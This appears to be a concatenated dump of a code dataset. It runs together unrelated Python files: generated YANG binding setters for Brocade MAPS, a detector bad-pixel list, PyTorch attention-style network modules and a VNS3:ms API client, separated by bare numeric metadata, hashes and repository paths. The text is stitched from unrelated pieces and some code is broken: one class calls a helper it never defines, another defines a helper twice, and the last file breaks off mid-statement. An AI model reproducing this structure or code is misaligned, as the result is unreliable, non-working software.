load=False): """ Setter method for enable, mapped from YANG variable /rbridge_id/maps/enable (container) If this variable is read-only (config: false) in the source YANG file, then _set_enable is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_enable() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """enable must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)""", }) self.__enable = t if hasattr(self, '_set'): self._set() def _unset_enable(self): self.__enable = YANGDynClass(base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True) def _get_email(self): """ Getter method for email, mapped from YANG variable /rbridge_id/maps/email (container) """ return self.__email def _set_email(self, v, load=False): """ Setter method for email, mapped from YANG variable /rbridge_id/maps/email (container) If this variable is read-only (config: false) in the source YANG file, then _set_email is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_email() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """email must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)""", }) self.__email = t if hasattr(self, '_set'): self._set() def _unset_email(self): self.__email = YANGDynClass(base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True) def _get_relay(self): """ Getter method for relay, mapped from YANG variable /rbridge_id/maps/relay (list) """ return self.__relay def _set_relay(self, v, load=False): """ Setter method for relay, mapped from YANG variable /rbridge_id/maps/relay (list) If this variable is read-only (config: false) in the source YANG file, then _set_relay is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_relay() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """relay must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""", }) self.__relay = t if hasattr(self, '_set'): self._set() def _unset_relay(self): self.__relay = YANGDynClass(base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True) logicalgroup = __builtin__.property(_get_logicalgroup, _set_logicalgroup) rule = __builtin__.property(_get_rule, _set_rule) policy = __builtin__.property(_get_policy, _set_policy) enable = __builtin__.property(_get_enable, _set_enable) email = __builtin__.property(_get_email, _set_email) relay = __builtin__.property(_get_relay, _set_relay) _pyangbind_elements = {'logicalgroup': logicalgroup, 'rule': rule, 'policy': policy, 'enable': enable, 'email': email, 'relay': relay, }
90.105263
1,091
0.729447
3,870
27,392
4.977519
0.051163
0.025749
0.034886
0.037377
0.879406
0.866116
0.86051
0.85428
0.851373
0.841406
0
0.000248
0.116019
27,392
303
1,092
90.40264
0.795284
0.095028
0
0.453608
0
0.030928
0.436796
0.158868
0
0
0
0
0
1
0.108247
false
0
0.072165
0
0.298969
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73753d81513c855738837750580f91ea4b3e5902
3,219
py
Python
pyCHX/v2/_futurepyCHX/Badpixels.py
NSLS-II/pyCHX
e82e343903e477c4359b03c4d079eb1e5202c25f
[ "BSD-3-Clause" ]
2
2021-07-21T02:07:11.000Z
2022-02-18T02:57:49.000Z
pyCHX/v2/_futurepyCHX/Badpixels.py
NSLS-II/pyCHX
e82e343903e477c4359b03c4d079eb1e5202c25f
[ "BSD-3-Clause" ]
5
2021-06-16T20:31:45.000Z
2022-02-04T21:24:45.000Z
pyCHX/v2/_futurepyCHX/Badpixels.py
NSLS-II/pyCHX
e82e343903e477c4359b03c4d079eb1e5202c25f
[ "BSD-3-Clause" ]
2
2022-02-04T21:51:28.000Z
2022-03-22T04:11:19.000Z
"""Dev@Octo12,2017""" import numpy as np damaged_4Mpixel = np.array( [ [1157, 2167 - 1231], [1158, 2167 - 1231], [1159, 2167 - 1231], [1160, 2167 - 1231], [1157, 2167 - 1230], [1158, 2167 - 1230], [1159, 2167 - 1230], [1160, 2167 - 1230], [1161, 2167 - 1230], [1157, 2167 - 1229], [1158, 2167 - 1229], [1159, 2167 - 1229], [1160, 2167 - 1229], [1159, 2167 - 1228], [1160, 2167 - 1228], [1159, 2167 - 1227], [1160, 2167 - 1227], [1159, 2167 - 1226], ] ) # March 1, 2018 # uid = '92394a' bad_pixel_4M = { "92394a": np.array( [ 828861, 882769, 915813, 928030, 959317, 959318, 992598, 992599, 998768, 1009202, 1036105, 1143261, 1149650, 1259208, 1321301, 1426856, 1426857, 1586163, 1774616, 1936607, 1936609, 1936610, 1938677, 1938678, 1938681, 1940747, 1946959, 1955276, 2105743, 2105744, 2107813, 2107815, 2109883, 2118276, 2118277, 2149798, 2194925, 2283956, 2284016, 2284225, 2284388, 2290249, 2292593, 2298770, 2304729, 2317145, 2344268, 2346156, 2356554, 2360827, 2364960, 2408361, 2453913, 2470447, 2476691, 3462303, 4155535, ] ), # 57 points, coralpor "6cc34a": np.array( [1058942, 2105743, 2105744, 2107813, 2107815, 2109883, 4155535] ), # coralpor } ## Create during 2018 Cycle 1 BadPix_4M = np.array( [ 828861, 882769, 915813, 928030, 959317, 959318, 992598, 992599, 998768, 1009202, 1036105, 1143261, 1149650, 1259208, 1321301, 1426856, 1426857, 1586163, 1774616, 1936607, 1936609, 1936610, 1938677, 1938678, 1938681, 1940747, 1946959, 1955276, 2105743, 2105744, 2107813, 2107815, 2109883, 2118276, 2118277, 2149798, 2194925, 2283956, 2284016, 2284225, 2284388, 2290249, 2292593, 2298770, 2304729, 2317145, 2344268, 2346156, 2356554, 2360827, 2364960, 2408361, 2453913, 2470447, 2476691, 3462303, 4155535, 1058942, 2105743, 2105744, 2107813, 2107815, 2109883, 4155535, 2107814, 3462303, ] )
19.047337
71
0.396707
222
3,219
5.734234
0.436937
0.037706
0.065986
0.087981
0.700707
0.700707
0.700707
0.623723
0.623723
0.623723
0
0.737726
0.519105
3,219
168
72
19.160714
0.084625
0.031687
0
0.773585
0
0
0.003863
0
0
0
0
0
0
1
0
false
0
0.006289
0
0.006289
0
0
0
0
null
0
0
0
0
1
1
0
0
1
0
1
1
0
0
0
0
1
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73b0d45dfef30d5094f6080613673ff87487a344
13,695
py
Python
model/Models.py
lnpandey/DL_explore_synth_data
0a5d8b417091897f4c7f358377d5198a155f3f24
[ "MIT" ]
2
2019-08-24T07:20:35.000Z
2020-03-27T08:16:59.000Z
model/Models.py
lnpandey/DL_explore_synth_data
0a5d8b417091897f4c7f358377d5198a155f3f24
[ "MIT" ]
null
null
null
model/Models.py
lnpandey/DL_explore_synth_data
0a5d8b417091897f4c7f358377d5198a155f3f24
[ "MIT" ]
3
2019-06-21T09:34:32.000Z
2019-09-19T10:43:07.000Z
import numpy as np import torch.nn as nn import torch.optim as optim import torch import torchvision import torch.nn.functional as F device = torch.device("cuda" if torch.cuda.is_available() else "cpu") print(device) class Module1(nn.Module): ''' returns last layer output Input : 32X32X3 image Convolutional Network with 4 Conv layers ''' def __init__(self,inp,out): super(Module1,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = F.relu(self.conv2(x)) x = F.relu(self.conv3(x)) #print(x.shape) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Module2(nn.Module): ''' return last layer output, 3rd convolution layer output Input : 32X32X3 image Output : x: last layer output, x1: 3rd convolution layer output Convolutional Network with 4 Conv layers ''' def __init__(self,inp,out): super(Module2,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = F.relu(self.conv2(x)) x = self.conv3(x) #print(x.shape) x1 = F.tanh(x) x = F.relu(x) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x,x1 class Module3(nn.Module): ''' return last layer output, 2nd convolution layer output Input : 32X32X3 image Output : x: last layer output, x1: second convolution layer output ''' def __init__(self,inp,out): super(Module3,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = self.conv2(x) x1 = F.tanh(x) x = F.relu(x) x = F.relu(self.conv3(x)) #print("Flag1",x1.shape) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x,x1 class Module4(nn.Module): ''' return last layer output, first convolution layer output Input : 32X32X3 image Output : x: last layer output, x1: first convolution layer output ''' def __init__(self,inp,out): super(Module4,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 12, 5) self.conv3 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 * 6 * 6, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.conv1(x) x1 = F.tanh(x) x = self.pool(F.relu(x)) x = F.relu(self.conv2(x)) x = F.relu(self.conv3(x)) #print("Flag1",x1.shape) x = x.view(-1, 20* 6 * 6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x,x1 class Module5(nn.Module): ''' return last layer output Input : 32X32X3 image Convolutional Network with 2 Conv layers Output: returns last layer output ''' def __init__(self,inp,out): super(Module5,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 16, 5) self.fc1 = nn.Linear(16 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x = self.pool(F.relu(self.conv2(x))) x = x.view(-1, 16 * 5 * 5) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Focus_Module(nn.Module): ''' Focus Network uses Module 1 averages at zeroth layer ''' def __init__(self,inp,out): super(Focus_Module, self).__init__() self.inputs = inp self.output = out self.module1 = Module1(self.inputs,self.output) def forward(self, z): #print(z.shape) #print() batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,self.inputs, 32,32], dtype=torch.float64) x,y = x.to(device),y.to(device) for i in range(9): x[:,i] = self.helper(z[:,i])[:,0] x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],z[:,i]) return y , x def helper(self,x): x = self.module1(x) #print(x.shape) return x class Focus_Module2(nn.Module): ''' Focus Network uses Module 2 averages at 3rd conv layer ''' def __init__(self,inp,out): super(Focus_Module2, self).__init__() self.inputs = inp self.output = out self.module = Module2(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,20, 6,6], dtype=torch.float64) feature = torch.zeros([batch,9,20,6,6],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp,ftr= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] feature[:,i] = ftr x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x def helper(self,x): x,features = self.module(x) #print(x.shape) return x,features class Focus_Module3(nn.Module): ''' Focus Network uses Module 3 averages at conv layer 2 ''' def __init__(self,inp,out): super(Focus_Module3, self).__init__() self.inputs = inp self.output = out self.module = Module3(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,9, 6,10], dtype=torch.float64) feature = torch.zeros([batch,9,6,10,10],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp,ftr= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] feature[:,i] = ftr x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x def helper(self,x): x,features = self.module(x) #print(x.shape) return x,features class Focus_Module4(nn.Module): ''' Focus Network uses Module 4 averages at conv layer 1 ''' def __init__(self,inp,out): super(Focus_Module4, self).__init__() self.inputs = inp self.output = out self.module = Module4(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,6, 28,28], dtype=torch.float64) feature = torch.zeros([batch,9,6,28,28],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp,ftr= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] feature[:,i] = ftr x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x class Focus_Module5(nn.Module): ''' Focus Network uses Module 5 averages at zroth layer ''' def __init__(self,inp,out): super(Focus_Module5, self).__init__() self.inputs = inp self.output = out self.module = Module5(self.inputs,self.output) def forward(self, z): #print("flag1",z.shape) #print("flag2",z[:,0].shape) batch = z.shape[0] x = torch.zeros([batch,9],dtype=torch.float64) y = torch.zeros([batch,3, 32,32], dtype=torch.float64) feature = torch.zeros([batch,9,3,32,32],dtype=torch.float64) x,y = x.to(device),y.to(device) feature = feature.to(device) for i in range(9): alp= self.helper(z[:,i]) #print("flag3",ftr.shape) x[:,i] = alp[:,0] x = F.softmax(x,dim=1) # alphas #x1 = x[:,0] #torch.mul(x1[:,None,None,None],z[:,0]) for i in range(9): x1 = x[:,i] y = y + torch.mul(x1[:,None,None,None],feature[:,i]) return y , x def helper(self,x): x,features = self.module(x) #print(x.shape) return x,features def helper(self,x): x= self.module(x) #print(x.shape) return x class Classification_Module(nn.Module): ''' Classification Network data averaged at zeroth layer ''' def __init__(self,inp,out): super(Classification_Module,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 8, 5) self.fc1 = nn.Linear(8 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): #print("input",x.shape) x = self.pool(F.relu(self.conv1(x))) x = self.pool(F.relu(self.conv2(x))) #print("middle",x.shape) x = x.view(-1,8*5*5) #print() x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) #print("output",x.shape) return x class Classification_Module2(nn.Module): ''' Classification Network averaged data at 3rd conv layer ''' def __init__(self,inp,out): super(Classification_Module2,self).__init__() self.inputs = inp self.output = out self.fc1 = nn.Linear(20 *6 *6 , 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = x.view(-1,20*6*6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Classification_Module3(nn.Module): ''' Classification Network averaged data at conv layer 2 ''' def __init__(self,inp,out): super(Classification_Module3,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 20, 5) self.fc1 = nn.Linear(20 *6 *6 , 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = F.relu(self.conv1(x)) #print("flag1",x.shape) x = x.view(-1,20*6*6) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Classification_Module4(nn.Module): ''' Classification Network averages data at conv layer 1 ''' def __init__(self,inp,out): super(Classification_Module4,self).__init__() self.inputs = inp self.output = out self.pool = nn.MaxPool2d(2, 2) self.conv1 = nn.Conv2d(self.inputs, 12, 5) self.conv2 = nn.Conv2d(12,20,5) self.fc1 = nn.Linear(20 *8 *8 , 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = F.relu(self.pool(self.conv1(x))) x= F.relu(self.conv2(x)) #print("flag1",x.shape) x = x.view(-1,20*8*8) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x class Classification_Module5(nn.Module): ''' Classification Network data averaged at zeroth conv layer ''' def __init__(self,inp,out): super(Classification_Module5,self).__init__() self.inputs = inp self.output = out self.conv1 = nn.Conv2d(self.inputs, 6, 5) self.pool = nn.MaxPool2d(2, 2) self.conv2 = nn.Conv2d(6, 16, 5) self.fc1 = nn.Linear(16 * 5 * 5, 120) self.fc2 = nn.Linear(120, 84) self.fc3 = nn.Linear(84, 10) self.fc4 = nn.Linear(10,self.output) def forward(self,x): x = self.pool(F.relu(self.conv1(x))) x= self.pool(F.relu(self.conv2(x))) #print("flag1",x.shape) x = x.view(-1,16*5*5) x = F.relu(self.fc1(x)) x = F.relu(self.fc2(x)) x = F.relu(self.fc3(x)) x = self.fc4(x) return x
26.185468
71
0.586272
2,229
13,695
3.538807
0.053387
0.018002
0.054767
0.049442
0.917977
0.915314
0.861942
0.838109
0.801597
0.739478
0
0.067942
0.240161
13,695
522
72
26.235632
0.690083
0.154801
0
0.793605
0
0
0.000618
0
0
0
0
0
0
1
0.101744
false
0
0.017442
0
0.22093
0.002907
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73bafee8aff0375936e003f370e59ec1424ca003
37,976
py
Python
cohesivenet/api/vns3ms/system_api.py
cohesive/python-cohesivenet-sdk
5620acfa669ff97c94d9aa04a16facda37d648c1
[ "MIT" ]
null
null
null
cohesivenet/api/vns3ms/system_api.py
cohesive/python-cohesivenet-sdk
5620acfa669ff97c94d9aa04a16facda37d648c1
[ "MIT" ]
null
null
null
cohesivenet/api/vns3ms/system_api.py
cohesive/python-cohesivenet-sdk
5620acfa669ff97c94d9aa04a16facda37d648c1
[ "MIT" ]
null
null
null
# coding: utf-8 """ VNS3:ms API Cohesive networks VNS3 provides complete control of your network's addresses, routes, rules and edge. Networking does # noqa: E501 Contact: solutions@cohesive.net Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 from cohesivenet.api_builder import VersionRouter def get_remote_support_details(api_client, **kwargs): # noqa: E501 """Get Remote Support Details # noqa: E501 Get Remote Support details - check if enabled # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_remote_support_details(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def put_remote_support(api_client, enable=False, **kwargs): # noqa: E501 """Get Remote Support Details # noqa: E501 Enable/Disable remote support # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.put_remote_support(enable=True, async_req=True) :param VNS3Client api_client: (required) :param enable bool: Enable/Disable remote support(required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["enable"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support", "PUT", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_remote_support_keypair_details(api_client, **kwargs): # noqa: E501 """Get Remote Support Keypair status # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_remote_support_keypair_details(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support/keypair", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def post_generate_remote_support_keypair( api_client, encrypted_passphrase=None, **kwargs ): # noqa: E501 """Generate new remote support keypair # noqa: E501 Will regenerate keyapir if one already exists # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.post_generate_remote_support_keypair("asdfasd", async_req=True) :param VNS3Client api_client: (required) :param encrypted_passphrase str: Encrypted passphrase string :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["encrypted_passphrase"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return 